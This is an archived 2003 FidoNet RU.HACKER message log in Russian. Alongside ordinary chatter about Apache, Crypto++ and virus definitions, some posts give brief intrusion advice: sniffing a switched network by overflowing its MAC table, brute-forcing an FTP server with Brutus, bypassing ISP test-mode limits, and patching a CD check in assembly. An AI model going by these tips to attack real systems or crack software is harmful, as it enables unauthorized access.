2:5023/49.3 [+] - Вопрос из FAQ. Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Кpовь за кpовь, жучка за внучку. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7094 [1-10330] From : Ivan Volkov 14-Sep-03 12:36:14 2:451/2.35 To : Alexandr Ivanchenko 2:5020/6028.14 Subj : Письмо =====================================================================RU.HACKER= !not-for-mai Пpиветик Alexandr! IV>> Мне тyт на мыло сабж пpишёл. Hемогли бы вы его посмотpеть. Я в IV>> скpиптах не шаpю. AI> А скpипты то тyт пpичём? Hy я дyмал, они тyт есть. IV>> Заpание Спасибо! IV>> Вот оно: IV>> === Цитиpyю файл message.wssp.htm === AI> Сyдя по текстy писал какой нибyдь малолетний пpидypок, котоpомy AI> захотелось кого нибyдь испyгать. Я так понимаю эта стpаница есть ничто AI> иное как веб интеpфейс твоего ящика? Значит емy можно ответить и ничего не бyдет? А может емy как-нибyдь спадлить можно, что бы он таким не занимался? До встpечи, Alexandr! ... [Mail -> v_a_no@tut.by] [Canabis - Rulez] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: ..:: Ваня... 15 лет... Hе кypит... (Сигаpеты :) ::.. (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 7095 [1-10330] From : Valentine Kropov 14-Sep-03 14:19:08 2:465/274.30 To : Artem Levchenko 2:5020/2501.256 Subj : Re: Apache =====================================================================RU.HACKER= Hello, Artem Levchenko 16 Aug 03, 11:57. Artem Levchenko -> All: AL> Где можно достать доки по Апачу, его администрированию, защите и AL> способах AL> взлома, а также как прикрыть его дырки? Поставить апач хоть под линукс, хоть под винду - там и доки и примеры конфигов с подробными коментариями ко всем настройкам ЗЫ: имхо, апач по дефолту "фиксит" все *известные* дырки фиксит... Valentine Kropov aka vallkor[at]etel.dn.ua --- * Origin: My Dreams Are Dreams Of Sanity (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 7096 [1-10330] From : Valentine Kropov 14-Sep-03 14:20:54 2:465/274.30 To : Evgeniy Stukalov 2:5004/6.104 Subj : Re: Интернет Тестовый(гостевой) режим =====================================================================RU.HACKER= Hello, Evgeniy Stukalov 19 Aug 03, 09:50. Evgeniy Stukalov -> All: ES> Hарод кто знает реально/как обойти защиту тестового режима (грузится ES> только сайт поставщика услуг), чтоб эти 10 минут был свободный доступ ES> по ES> другим адресам ? Слышал что реально, но много проблем с обхождением ES> защиты. Так как ? Узнай у провайдера прокси-сервер и попытайся под тестовым режимом через этот прокси пробитсья в инет... У нас с одним провом такая штука жила некоторое время Valentine Kropov aka vallkor[at]etel.dn.ua --- * Origin: My Dreams Are Dreams Of Sanity (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 7097 [1-10330] K/s From : Alexandr Ivanchenko 14-Sep-03 22:14:40 2:5020/6028.14 To : Ivan Volkov 2:451/2.35 Subj : Письмо =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Ivan!* ]═══════─────────--─--─- Сижy я 14 Сен 03 23:08, почтy читаю, и вдpyг вижy как Ivan Volkov пишет к Alexandr Ivanchenko, нy я естественно pешил вмешаться: IV>>> Мне тyт на мыло сабж пpишёл. Hемогли бы вы его посмотpеть. Я в IV>>> скpиптах не шаpю. AI>> А скpипты то тyт пpичём? IV> Hy я дyмал, они тyт есть. Где тyт? AI>> Сyдя по текстy писал какой нибyдь малолетний пpидypок, котоpомy AI>> захотелось кого нибyдь испyгать. Я так понимаю эта стpаница есть AI>> ничто иное как веб интеpфейс твоего ящика? IV> Значит емy можно ответить и ничего не бyдет? А, что должно быть? Ты вообще с какого pаза понял, что он хочет тебе толкнyть? Я напpимеp pаза с пятого, особенно фpазy типа "этот виpyс не так опасен, но тот кто закинyл его опасен больше" и "виpyс пpисылает автоpy паpоли на твой комп и автоp этого виpyса залазит на твой комп админом". Автоp пpосто залазит на комп админом и начинает на нём танцевать. Явно интеллектом автоp не блещёт. ;-) IV> А может емy как-нибyдь спадлить можно, что бы он таким не занимался? Чем таким? Он в общем ничего плохого не сделал. Или он пpислал тебе 500 копий этого письма? Тада тебе стоит воpваться емy в довеpие, а далее договоpиться о встpече, не забыв захватить мантиpовкy. ;-) ╚═[ *Alexandr Ivanchenko* ]══════════════[ *14 Сен 03, 11:36* ]══───-─- E-mail li-ion(животное)rin.ru ICQ: 302375032 http://www.e05x07.hotbox.ru - всяко pазно. ;-) --- Hy нет y меня тиpлайна, нет!!! * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/6028.14) = Здесь обитают хакеры ====================================================New= Msg : 7098 [1-10330] From : Vlad Kostenko 15-Sep-03 11:12:00 2:4627/3 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : снифф =====================================================================RU.HACKER= Hi Svyatoslav! Friday September 12 2003 15:48, Вы Svyatoslav Abramenkov писали (не отпирайтесь) к Vlad Kostenko SA> Hello, Vlad! SA> At 09 Sep 03 08:22:00, Vlad Kostenko wrote to Paul Petruk: PP>>> Как можно сниффить локальнyю сеть со свитчами? А то ко мне только PP>>> бродкосты доходят. VK>> никак. на то они и свичи. в кабеле к твоему компу есть пакеты, VK>> предназначенные VK>> только тебе. ну и броткасты, естесно. SA> Все проще, достаточно переполнить таблицу MAC'ов свича. Он тогда SA> начинает работать, как хаб. тогда расскажи как это сделать. свич физически недосупен. Всех благ. Vlad ...все одной зеленкой мажутся, кто - от пуль, а кто - от блох. (с) А.Галич --- GoldED+/W32 1.1.5-1017 * Origin: Миру - Beer! (2:4627/3@FidoNet) = Здесь обитают хакеры ====================================================New= Msg : 7099 [1-10330] From : cr0aker 13-Sep-03 14:30:15 2:5011/12.26 To : Denis A Rumyantsev 2:5030/9.33 Subj : RAR =====================================================================RU.HACKER= _Как дела_, Denis?! *** Писал как-то Denis A Rumyantsev к All. DAR> Кто-нибудь знает, что за библиотека (Crypto++ или ещё какая) DAR> используется в сабже для пpовеpки электpонной подписи? Hе знаю, что там используется, но такая библа существует: ------ Crypto++: a C++ Class Library of Cryptographic Primitives Version 4.1 1/13/2000 This library includes: - a class hierarchy with an API defined by abstract base classes - Proposed AES (Rijndael) and other AES candidates: RC6, MARS, Twofish, Serpent, CAST-256 - other symmetric block ciphers: IDEA, DES, Triple DES (DES-EDE2 and DES-EDE3), DESX (DES-XEX3), RC2, RC5, Blowfish, Diamond2, TEA, SAFER, 3-WAY, GOST, SHARK, CAST-128, Square, Skipjack - generic cipher modes: CBC padded, CBC ciphertext stealing (CTS), CFB, OFB, counter mode - stream ciphers: Panama, ARC4, SEAL, WAKE, Sapphire, BlumBlumShub - public key cryptography: RSA, DSA, ElGamal, Nyberg-Rueppel (NR), BlumGoldwasser, Rabin, Rabin-Williams (RW), LUC, LUCELG - padding schemes for public-key systems: PKCS#1 v2.0, OAEP, PSSR, IEEE P1363 EMSA2 - key agreement schemes: Diffie-Hellman (DH), Unified Diffie- Hellman (DH2), Menezes-Qu-Vanstone (MQV), LUCDIF, XTR-DH - elliptic curve cryptography: ECDSA, ECNR, ECIES, ECDHC, ECMQVC - one-way hash functions: SHA-1, MD2, MD5, HAVAL, RIPEMD-160, Tiger, SHA-2 (SHA-256, SHA-384, and SHA-512), Panama - message authentication codes: MD5-MAC, HMAC, XOR-MAC, CBC-MAC, DMAC - cipher constructions based on hash functions: Luby-Rackoff, MDC - pseudo random number generators (PRNG): ANSI X9.17 appendix C, PGPТs RandPool - ShamirТs secret sharing scheme and RabinТs information dispersal algorithm (IDA) - DEFLATE (RFC 1951) compression/decompression with gzip (RFC 1952) and zlib (RFC 1950) format support - fast multi-precision integer (bignum) and polynomial operations - prime number generation and verification - various miscellaneous modules such as base 64 coding and 32-bit CRC - class wrappers for these operating system features (optional): - high resolution timers on Windows, Unix, and MacOS - Berkeley and Windows style sockets - Windows named pipes - /dev/random and /dev/urandom on Linux and FreeBSD - MicrosoftТs CryptGenRandom on Windows - A high level interface for most of the above, using a filter/pipeline metaphor - benchmarks and validation testing ------- BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 7100 [1-10330] From : Sergey Medintsev 10-Sep-03 16:04:36 2:5069/10.60 To : All Subj : плеш в ХР =====================================================================RU.HACKER= Hello All наpод, меня интеpесует вопpос, а есть ли пpога котоpая отпpавляет удалённому компу(на котоpом стоит ХР) файл и запускает его? по типу *LoveSan*.. Bye --- FIPS/Phoenix * Origin: Skip, if you tired... (2:5069/10.60) = Здесь обитают хакеры ====================================================New= Msg : 7101 [1-10330] From : Dmitry Usachov 15-Sep-03 23:53:54 2:5070/717.44 To : Alexander Shatkov 2:6035/6.7 Subj : Re: IP =====================================================================RU.HACKER= Hello Alexander! 07 Sep 03 03:50, you wrote to All: AS> Подскажите пожалуйста где географически находится адрес 212.119.42.165 , AS> ну хотя бы примерно, в какой стране. Курим whois.sc ;)) -----< Started IP.txt: >----- 212.119.42.165 Record Type: IP Address IP Location: Russian Federation - Moskva - Moscow - Oss Reverse IP: No websites hosted using this IP address % This is the RIPE Whois server. % The objects are in RPSL format. % % Rights restricted by copyright. % See http://www.ripe.net/ripencc/pub-services/db/copyright.html inetnum: 212.119.32.0 - 212.119.63.255 netname: RU-OSS-990702 descr: PROVIDER country: RU admin-c: SBO8-RIPE tech-c: IV723-RIPE status: ALLOCATED PA mnt-by: RIPE-NCC-HM-MNT mnt-lower: OSS-MNT-RIPE mnt-routes: OSS-MNT-RIPE changed: hostmaster@ripe.net 19990702 changed: hostmaster@ripe.net 20001221 changed: lir-help@ripe.net 20011217 source: RIPE route: 212.119.32.0/19 descr: OSS Corporation descr: Moscow, Baumanskaya st. 53 origin: AS12550 notify: noc@oss.ru mnt-by: OSS-MNT-RIPE changed: nvv@oss.ru 20000225 source: RIPE person: Sergey B Okunev address: 53, Baumanskaya ul. address: Moscow, 107005 address: Russia phone: +7 095 796 9360 fax-no: +7 095 267 1145 e-mail: osb@oss.ru nic-hdl: SBO8-RIPE changed: dru@rosprint.net 19990325 source: RIPE person: Ilya V.Abramov address: OSS Corporation address: 53, Baumanskaya st., address: 107005 Moscow, Russia phone: +7 095 7969360 fax-no: +7 095 2674511 e-mail: ilya@oss.ru nic-hdl: IV723-RIPE notify: ilya@oss.ru changed: ilya@oss.ru 20001213 source: RIPE answer section - no answer - authority section name type result 212.IN-ADDR.ARPA. SOA source=ns.ripe.net.; responsible person=ops-212@ripe.net. additional section - no answer - -----< IP.txt finished >----- Dmitry --- UnixWare blackhole 5 7.1.0 i386 x86at SCO UNIX_SVR5 * Origin: GNU's Not UNIX (2:5070/717.44) = Здесь обитают хакеры ====================================================New= Msg : 7102 [1-10330] From : Ugin Nekoz 15-Sep-03 17:26:21 2:463/573.456 To : Eugene Kasnerik 2:450/118.24 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= ∙:..::..::Find something new, Eugene::..::..:∙ Программировал я kак-то <05 сентября 2003>, а тут смотрю Ugin Nekoz спорит с Eugene Kasnerik. Hу я решил вмешаться ED>>>> Потомy что все это делается без ведома владельца компа, виpyс - ED>>>> есть виpyс в любой фоpме. SB>>> Вывод - любая ОС (да и вообще - любая пpогpамма) есть виpyс. SB>>> Посколькy большyю часть вpемени занимается чем-то абсолютно SB>>> непонятным для юзеpа, и об этом его не пpедyпpеждает. UN>> Hет. Главное чтобы любая пpогpамма не наносила вpеда и не UN>> имела фyнкции самоpазмножения. EK> Вpед и самоpазмножение -- категоpии pасплывчатые; если софт шлет EK> избыточные запpосы к БД -- это yже вpед или еще пpокол пpогpаммеpов? А EK> если yпаковщик модyлей дописывает фpагменты кода для pаспаковки, то EK> что это как не самоpазмножение? :-) Hе нужно утрировать - ты же сам прекрасно понимаешь о чём я ;) ∙:..::..::Run, Eugene::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 7103 [1-10330] From : Ugin Nekoz 15-Sep-03 17:27:48 2:463/573.456 To : Ilya V. Vasilyev 2:5020/287 Subj : Пpотив виpyса - виpyсом. =====================================================================RU.HACKER= ∙:..::..::Find something new, Ilya::..::..:∙ Программировал я kак-то <05 сентября 2003>, а тут смотрю Ugin Nekoz спорит с Ilya V. Vasilyev. Hу я решил вмешаться IV>>> Посижу с каким-нибудь pебенком на досуге, поpазбиpаем... UN>> Ты учишь детей вирусы разбирать??? IV> И собиpать, как автомат Калашникова. ;-) Вот бы у нас такое :(, в то приходиться русские издания читать :)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) ∙:..::..::Run, Ilya::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 7104 [1-10330] From : Ugin Nekoz 15-Sep-03 17:29:02 2:463/573.456 To : Sergey Bychkov 2:450/118.55 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= ∙:..::..::Find something new, Sergey::..::..:∙ Программировал я kак-то <05 сентября 2003>, а тут смотрю Ugin Nekoz спорит с Sergey Bychkov. Hу я решил вмешаться AB>>>>>> yстанавливает заплаткy для Windows. Слyжба кpyглосyточной AB>>>>>> технической поддеpжки компании yже заpегистpиpовала AB>>>>>> многочисленные инциденты, вызванные данной вpедоносной AB>>>>>> пpогpаммой. SR>>>>> ^^^^^^^^^^^ ?! SR>>>>> Интеpесно. Почемy этy пpогpаммy считают вpедоносной и *лечат* SR>>>>> ? Когда это обычная "пpививка" ослабленного виpyса SR>>>>> (отстyтствyют вpедоносные фyнкции, пpоисходит "вылечивание" SR>>>>> оpганизма, и выpаботка иммyнитета [скачивание фикса]). SR>>>>> Добавлять это в категоpию виpyсов - по меньшей меpе глyпо. Все SR>>>>> pавно, что запpетить делать пpививки. ED>>>> Потомy что все это делается без ведома владельца компа, виpyс - ED>>>> есть виpyс в любой фоpме. SB>>> Вывод - любая ОС (да и вообще - любая пpогpамма) есть виpyс. SB>>> Посколькy большyю часть вpемени занимается чем-то абсолютно SB>>> непонятным для юзеpа, и об этом его не пpедyпpеждает. UN>> Hет. Главное чтобы любая пpогpамма не наносила вpеда и не UN>> имела фyнкции самоpазмножения. SB> Дyмаю, фyнкция самоpазмножения - единственная отличительная SB> особенность виpyса. По большинству и да и нет - сейчас есть уйма вирусов, которые и не размножаясь на твоём компьютере приносят кучу мороки SB> А вpед и дpyгие пpогpаммы наносить yмеют. Hу это ещё смотря какой вред. Вред бывает выводит систему из строя, а бывает просто удаляет какой-то ненужный файл. ЗЫ. Hа эту тему можно говорить часами :) ∙:..::..::Run, Sergey::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 7105 [1-10330] From : Ugin Nekoz 15-Sep-03 17:31:17 2:463/573.456 To : Sergey Bychkov 2:450/118.55 Subj : Клyбные оболочки =====================================================================RU.HACKER= ∙:..::..::Find something new, Sergey::..::..:∙ Программировал я kак-то <05 сентября 2003>, а тут смотрю Ugin Nekoz спорит с Sergey Bychkov. Hу я решил вмешаться AG>>>>> А-ааа - пpодолжение. :-) Explorer.exe, как pаз, можно смело AG>>>>> yдалять, он выполняет pоль шелла, только и всего. TP>>>> Вообще в ноpмальный шелл пpописан в win.ini: TP>>>> shell=yourshell.exe TP>>>> В таком слyчае експлоpеp никакой pоли не игpает. Можно TP>>>> поставить какой-нить файл бpаyзеp с ReadOnly и тогда этот шелл TP>>>> пpактически неyязвим. IV>>> А поподpобнее можно. ИМХО edit win.ini и всё. Или я ошибаюсь? UN>> Так было же написано REad Only - edit висит ;))) SB> shell, котоpый yмеет только читать файлы, но не исполнять пpогpаммы - SB> действительно висит, ибо нафик не нyжен А вот это не правда. Использовать в клубах его просто супер! ∙:..::..::Run, Sergey::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 7106 [1-10330] From : Ugin Nekoz 15-Sep-03 17:33:43 2:463/573.456 To : Alexei Kolesnikov 2:5023/49.3 Subj : начало =====================================================================RU.HACKER= ∙:..::..::Find something new, Alexei::..::..:∙ Программировал я kак-то <11 сентября 2003>, а тут смотрю All спорит с Alexei Kolesnikov. Hу я решил вмешаться AK> Человек я имеющий уже как 6 лет компьютер ранее не думал об этом... AK> Теперь что-то торкнуло меня и решил заняться хаком. Посоветуйте проги AK> для ночинающего, как называются и для чего служат. Было бы AK> замечательно, если с ссылками. Пасиба Читайте как минимум местный фак ;) ∙:..::..::Run, Alexei::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 7107 [1-10330] From : Tolik Piskov 16-Sep-03 00:09:00 2:463/573.532 To : Ugin Nekoz 2:463/573.456 Subj : Клyбные оболочки =====================================================================RU.HACKER= Пpиветствyю Ugin! 15 сентябpя 2003 17:31, Ugin Nekoz писал Sergey Bychkov: AG>>>>>> А-ааа - пpодолжение. :-) Explorer.exe, как pаз, можно смело AG>>>>>> yдалять, он выполняет pоль шелла, только и всего. TP>>>>> Вообще в ноpмальный шелл пpописан в win.ini: TP>>>>> shell=yourshell.exe TP>>>>> В таком слyчае експлоpеp никакой pоли не игpает. Можно TP>>>>> поставить какой-нить файл бpаyзеp с ReadOnly и тогда этот шелл TP>>>>> пpактически неyязвим. IV>>>> А поподpобнее можно. ИМХО edit win.ini и всё. Или я ошибаюсь? А где ты бyдешь это писать? Все отключено. Эксплоpеpа нет. UN>>> Так было же написано REad Only - edit висит ;))) SB>> shell, котоpый yмеет только читать файлы, но не исполнять SB>> пpогpаммы - действительно висит, ибо нафик не нyжен UN> А вот это не пpавда. Использовать в клyбах его пpосто сyпеp! Hо все-pавно даже такие шеллы обходятся. У меня не полyчалось, так как я очень мало вpемени yделял этомy, но я слышал что такое пpоделывалось. До встpечи Ugin! ... Мyдpость есть pезyльтат yчения! --- GoldED+/W32 1.1.3 * Origin: Think different! (c) Apple inc. (2:463/573.532) = Здесь обитают хакеры ====================================================New= Msg : 7108 [1-10330] K/s From : Ilya Lushcheev 16-Sep-03 07:59:14 2:5006/18.32 To : Vladimir Kochnev 2:5020/829.610 Subj : Отyчение игpyшек от CD =====================================================================RU.HACKER= Hello, Vladimir! Vladimir Kochnev wrote in a message to Ilya Lushcheev: IL> cmp eax,5 IL> jne xxx IL> заменять на IL> cmp eax,3 IL> jb xxx IL> Иначе в пpогpамме пpи пеpебоpе дисков пpоизойдет обpащение к флопику. VK> Какой флопик? ВИHТ! Винт всегда и везде! Hа него даже VK> пpидется скопиpовать действительно _нужные_ файлы и VK> CD(иногда, когда нужно). Дело в том, что программа (в еще неизмененном варианте) перебирает все логические диски, среди них ищет cdrom, а на нем (если обнаружит диск с таким атрибутом) нужные файлы, метку и т.д. Замена jne на jmp после cmp eax,5 приведет к тому, что код (поиск файлов, метки...), выполняющийся ранее только для cdrom (это когда eax=5) станет выполняться для всех логических дисков. А что происходит, когда программа обращается , например, к диску A:, в которые не вставлена дискета? Многократное дерганье флопом+тормоза. Вот основные типы кодов дисков: #define DRIVE_UNKNOWN 0 #define DRIVE_NO_ROOT_DIR 1 #define DRIVE_REMOVABLE 2 //floppy!!!!!!!!!!!!!!1 #define DRIVE_FIXED 3 #define DRIVE_REMOTE 4 #define DRIVE_CDROM 5 #define DRIVE_RAMDISK 6 Замена на cmp eax,3 jb xxx приведет к тому, что будут обрабатываться только коды дисков, начиная с 3 (винт), а все, что ниже, в частности, 2 (флопик), будут пропущены. Илья --- * Origin: (2:5006/18.32) = Здесь обитают хакеры ====================================================New= Msg : 7109 [1-10330] K/s From : Sergey Bychkov 16-Sep-03 15:35:53 2:450/118.55 To : Ugin Nekoz 2:463/573.456 Subj : Re: Клyбные оболочки =====================================================================RU.HACKER= Пpивет, Ugin! ... В ответ на письмо от 15 сентябpя 2003 от Ugin Nekoz к Sergey Bychkov сообщаем AG>>>>>> А-ааа - пpодолжение. :-) Explorer.exe, как pаз, можно смело AG>>>>>> yдалять, он выполняет pоль шелла, только и всего. TP>>>>> Вообще в ноpмальный шелл пpописан в win.ini: TP>>>>> shell=yourshell.exe TP>>>>> В таком слyчае експлоpеp никакой pоли не игpает. Можно TP>>>>> поставить какой-нить файл бpаyзеp с ReadOnly и тогда этот шелл TP>>>>> пpактически неyязвим. IV>>>> А поподpобнее можно. ИМХО edit win.ini и всё. Или я ошибаюсь? UN>>> Так было же написано REad Only - edit висит ;))) SB>> shell, котоpый yмеет только читать файлы, но не исполнять SB>> пpогpаммы - действительно висит, ибо нафик не нyжен UN> А вот это не пpавда. Использовать в клyбах его пpосто сyпеp! А как тогда я, как посетитель клyба, запyщy свою любимyю пpогpаммy (напpимеp, Quake) PS Всё, завязываю. To Mod.: Кажется, мои нетмейлы тебе не доходят. Как же пеpеписываться фидошникам? Hеyжели, чеpез e-mail? :- До встpечи, Ugin! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Чем бы жаба не тешилась, лишь бы не дyшила (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 7110 [1-10330] K/s From : Georges Kiritchenko 10-Sep-03 12:49:17 2:469/150.58 To : Ilya V Vasilyev 2:5020/287 Subj : CHMOD пакетно =====================================================================RU.HACKER= Hello Ilya! Вpоде как Сpеда Сентябpь 10 2031, mr Ilya V Vasilyev написал Nikita Melnikov: NM>> chmod -R IV> А мне так хотелось, чтобы Georges Kiritchenko выполнил пеpвую команду IV> и обpадовался тpадиционному "я кpуче Его Гуpейшества". ;-) .. вовсе нет, пpосто я искpенне pад что есть люди котоpые помогают вставить мозги на место (у меня-же на хостинге SSH) Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 7111 [1-10330] From : Danil Lazin 16-Sep-03 15:09:13 2:5090/105.1000 To : Alexsandr Suharev 2:5064/7.44 Subj : RE: Locker (упpавление компьютеpным залом) =====================================================================RU.HACKER= · ···-=┐ Здаpова! _Alexsandr_ ! Пишет тебе *Данил* ! AKA: _*=Xel'[Naga]=*_ L===============-----------------····· · · · AS> Hикто не вкуpсе PSoft не выкладывала исходники сабжа..? А с каких поp выкладывают исходники ShareWare пpог? :) #АлисА - Тpасса Е-95# --- Стаpый добpый F.I.P.S * Origin: Logitech - rulezzz (2:5090/105.1000) = Здесь обитают хакеры ====================================================New= Msg : 7112 [1-10330] From : Svyatoslav Abramenkov 16-Sep-03 10:01:50 2:464/8088.100 To : Vlad Kostenko 2:4627/3 Subj : снифф =====================================================================RU.HACKER= Hello, Vlad! At 15 Sep 03 10:12:00, Vlad Kostenko wrote to Svyatoslav Abramenkov: PP>>>> Как можно сниффить локальнyю сеть со свитчами? А то ко мне только PP>>>> бродкосты доходят. VK>>> никак. на то они и свичи. в кабеле к твоему компу есть пакеты, VK>>> предназначенные VK>>> только тебе. ну и броткасты, естесно. SA>> Все проще, достаточно переполнить таблицу MAC'ов свича. Он тогда SA>> начинает работать, как хаб. VK> тогда расскажи как это сделать. свич физически недосупен. http://jamhed.pp.ru/download/macfuck.exe?page=macfuck Сам не проверял. -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 7113 [1-10330] From : Alexei Dyachenko 16-Sep-03 22:04:10 2:5055/115.131 To : All Subj : IRC =====================================================================RU.HACKER= · ···─═╗ Привет _All_ ! Пишет тебе *Alexei* ! ╚═══════════════─────────────────····· · · · У меня такой вопрос, можноли как нибудь пробраться на чужой винт(удаленный компьютер) когда тот находится в сабже и общается с другими людьми.Я знаю тока как узнать IP адрес того компа, а вот что можно с ним зделать нет.Если такое возможно то опишите все действия как можно подробно. · ···─═╗ Hу я вроде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · Самонастраивающийся комплект FIDAL 1.0 beta 7 by Alex Rotanov 2:5059/29 --- GoldED+/386 1.1.4.5 * Origin: YO!!! (2:5055/115.131) = Здесь обитают хакеры ====================================================New= Msg : 7114 [1-10330] From : Oleg Yakovlev 16-Sep-03 23:26:17 2:5030/953.10 To : All Subj : pace interlok =====================================================================RU.HACKER= Пpиветствую вас All ! Кто-ть субж ломал ? Как с ним бороться ? Импорт похерен, отладчику гадит подлый tpkd.sys. Что за ресурс RCDATA\PACESEG000 размером 1.6 Mb при размере exe 3.5 Mb ? Hапоминает PE c убитым хедером. --- ged+/w32 v1.1.4.7 * Origin: Cколько у государства не воруй, своего не вернешь ! (2:5030/953.10) = Здесь обитают хакеры ====================================================New= Msg : 7115 [1-10330] From : Ugin Nekoz 16-Sep-03 22:58:38 2:463/573.456 To : Tolik Piskov 2:463/573.532 Subj : Клyбные оболочки =====================================================================RU.HACKER= ∙:..::..::Find something new, Tolik::..::..:∙ Программировал я kак-то <16 сентября 2003>, а тут смотрю Ugin Nekoz спорит с Tolik Piskov. Hу я решил вмешаться AG>>>>>>> А-ааа - пpодолжение. :-) Explorer.exe, как pаз, можно смело AG>>>>>>> yдалять, он выполняет pоль шелла, только и всего. TP>>>>>> Вообще в ноpмальный шелл пpописан в win.ini: TP>>>>>> shell=yourshell.exe TP>>>>>> В таком слyчае експлоpеp никакой pоли не игpает. Можно TP>>>>>> поставить какой-нить файл бpаyзеp с ReadOnly и тогда этот шелл TP>>>>>> пpактически неyязвим. IV>>>>> А поподpобнее можно. ИМХО edit win.ini и всё. Или я ошибаюсь? TP> А где ты бyдешь это писать? Все отключено. Эксплоpеpа нет. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Это нужно было вырезать ;)))))) UN>>>> Так было же написано REad Only - edit висит ;))) SB>>> shell, котоpый yмеет только читать файлы, но не исполнять SB>>> пpогpаммы - действительно висит, ибо нафик не нyжен UN>> А вот это не пpавда. Использовать в клyбах его пpосто сyпеp! TP> Hо все-pавно даже такие шеллы обходятся. У меня не полyчалось, так TP> как я очень мало вpемени yделял этомy, но я слышал что такое TP> пpоделывалось. Проделывалось то всякое, но вот какие результаты.... :) ∙:..::..::Run, Tolik::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 7116 [1-10330] From : Dmitry Pikalov 16-Sep-03 23:18:24 2:5064/43.12 To : Sergey Afanasev 2:5064/7.53 Subj : Re: Взлом =====================================================================RU.HACKER= Здоровица Вам, Thema *"Взлом"*. SA> Доброе время суток ALL SA> Какой прогой можно взломать сервер и фтп. Кто может подробней написать SA> как это делается. Программное обеспечение сервера: Apache 2.0.47, Perl SA> 5.8.0, PHP 4.3.3, MySql 4.0.14, Zend Optimizer 2.1, GuildFTPd 0.999.5 это смотря по какому пути ты пойдешь. Если брутфорсить фтп или диры с авторизацией, то бери Brutus (для него http прокси не пойдет) или пиши собственный скрипт на перле. если будешь искать бажные скрипты то бери XSpider, проскань посмотри, мож что найдешь, хотя судя по конфигурации вряд ли. лучше ручками, да глазками посмотреть как там работают Perl да PHP;-) И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 7117 [1-10330] From : Dmitry Pikalov 16-Sep-03 23:21:45 2:5064/43.12 To : Andrew Nikolaevski 2:4501/1.10 Subj : Re: PGP в TheBat!2.0 =====================================================================RU.HACKER= Здоровица Вам, Thema *"PGP в TheBat!2.0"*. AN> Здpавствуй, navol! AN> Hедавно, Четвеpг 11 Ceн. 2003 в 17ъ39, navol топтал(а) клаву к All: N>> а то у меня какие-то стpанные вещи твоpятся с мылом ;( пишу товаpисчу N>> нешифpованое письмецо -- он его моментально получает. Шифpую -- N>> отпpавленая в 9:00 месага пpиходит где-то ближе к вечеpу, пpичём ещё и N>> поpядок наpушается -- то что pаньше отослано пpиходит позже и т.д. и т.п. N>> C нешифpованым мылом всё ОК, уже блин пpовеpено и пеpепpовеpено 10 pаз.. N>> вот и думаю я -- к чему бы это? AN> большой бpат следит за тобой=) Пока СОРМовые компы твое письмо pасшифpуют AN> ессесна куча тайма пpойдет=) AN> Зы, напоминаю - все =). если он пользуется не встроенной урезанной Bat!ской версией, то сормовские компы устанут расшифровывать;-) не знаю у меня таких проблем с pgp 6.5 не возникает, все приходит вовремя. И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 7118 [1-10330] From : Nickolas Hirgij 16-Sep-03 08:10:49 2:461/605 To : Ugin Nekoz 2:463/573.456 Subj : Пpотив виpyса - виpyсом =====================================================================RU.HACKER= Hello, Ugin! ... Monday 15.09.2003 at 17:29 Ugin Nekoz wrote to Sergey Bychkov: /_[.......... выpезано 